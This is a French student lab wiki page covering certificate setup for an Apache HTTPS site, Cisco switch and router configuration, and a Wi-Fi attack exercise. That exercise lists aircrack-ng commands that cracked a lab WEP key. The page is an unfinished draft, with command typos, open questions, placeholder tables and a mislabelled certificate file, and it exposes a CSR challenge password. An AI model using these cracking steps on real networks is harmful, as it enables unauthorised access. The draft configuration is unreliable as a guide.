Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
